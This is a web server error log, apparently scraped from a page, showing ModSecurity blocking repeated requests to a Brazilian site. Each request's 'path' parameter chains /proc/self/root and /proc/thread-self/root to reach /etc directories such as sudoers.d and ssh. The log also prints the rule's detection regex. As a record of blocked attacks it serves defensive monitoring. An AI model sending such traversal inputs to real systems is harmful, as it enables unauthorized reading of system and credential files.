https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:43:33.835215 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:41294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMdaBJNF7axNlVR0X-SgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:43:37.264337 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.243.203:41308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMeQb2qCuy5irgBMjKzQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:43:38.568454 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.243.203:41320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMepqmL8PQht4WJFlJ_AAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:43:41.299126 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:41332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMfQeiSKl8TjouI-YDygAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:44:02.923648 2026] [:error] [pid 2553:tid 140411674785536] [client 74.7.243.203:58496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMkv0Bec_B9OkZP_i-1AAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:44:06.788126 2026] [:error] [pid 2553:tid 140411574073088] [client 74.7.243.203:33632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMlv0Bec_B9OkZP_i-1wAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:44:08.181812 2026] [:error] [pid 1731:tid 140411574073088] [client 74.7.243.203:33646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMmAb2qCuy5irgBMjK1wAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:44:20.172030 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.243.203:33662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMpJDEJR9VXonE_-1RBgAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:44:34.355264 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.243.203:49652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMstCmCSWTlPouqorNfgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:44:52.021343 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.241.46:60850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMxO82sZHvlq4xgHrEyQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:45:00.203389 2026] [:error] [pid 2159:tid 140411548894976] [client 74.7.241.46:47308] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMzPct6CQ8jnRyg2p93gAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:45:10.371876 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:51812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM1tCmCSWTlPouqorNlQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:45:12.733619 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:38158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM2JqmL8PQht4WJFlKVQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:45:23.707188 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.241.46:38162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM4_0Bec_B9OkZP_i_AAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:45:27.512401 2026] [:error] [pid 2159:tid 140411733534464] [client 74.7.243.203:55942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM5_ct6CQ8jnRyg2p9_AAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:45:30.907705 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.243.203:47784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM6pqmL8PQht4WJFlKYQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:45:30.979188 2026] [:error] [pid 2553:tid 140411582465792] [client 74.7.241.46:34944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM6v0Bec_B9OkZP_i_BgAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:45:32.276255 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:45868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM7AeiSKl8TjouI-YD-QAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:45:32.286642 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.241.46:37310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM7JDEJR9VXonE_-1RPQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:45:37.177995 2026] [:error] [pid 1731:tid 140411616036608] [client 74.7.241.46:37326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablM8Qb2qCuy5irgBMjLAwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:46:06.941550 2026] [:error] [pid 1731:tid 140411725141760] [client 74.7.243.203:45882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNDgb2qCuy5irgBMjLIgAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
